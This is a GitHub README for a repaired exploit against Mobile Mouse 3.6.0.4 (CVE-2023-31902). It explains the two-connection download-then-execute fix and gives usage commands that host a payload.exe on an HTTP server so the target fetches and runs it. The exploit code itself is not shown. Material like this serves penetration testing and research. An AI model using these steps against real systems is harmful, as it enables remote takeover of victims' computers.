Skip to content

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
 
 
 
 

Repository files navigation

Mobile Mouse 3.6.0.4 RCE - Fix

A corrected version of the Mobile Mouse 3.6.0.4 remote code execution exploit published as EDB-51010.

Vulnerability

  • CVE: CVE-2023-31902
  • Affected version: Mobile Mouse 3.6.0.4
  • Default port: TCP/9099

What Was Fixed

The original exploit successfully downloads the payload but may fail to execute it because both stages use the same TCP connection.

This version:

  • Downloads the payload through the first session
  • Waits for the download to complete
  • Opens a fresh connection
  • Repeats the Mobile Mouse handshake
  • Executes the downloaded payload

It also uses sendall(), properly escaped Windows paths, socket timeouts, and basic error handling.

Usage

Start an HTTP server in the payload directory:

python3 -m http.server 8080

Run the exploit:

python3 exploit.py \
  --target 192.168.1.50 \
  --lhost 192.168.1.10 \
  --file payload.exe

Disclaimer

This project is intended only for authorized security testing and educational research. Do not use it against systems without explicit permission.

About

Mobile Mouse 3.6.0.4 - Remote Code Execution - CVE-2023-31902

Resources

Stars

Watchers

Forks

Releases

Packages

Contributors

Languages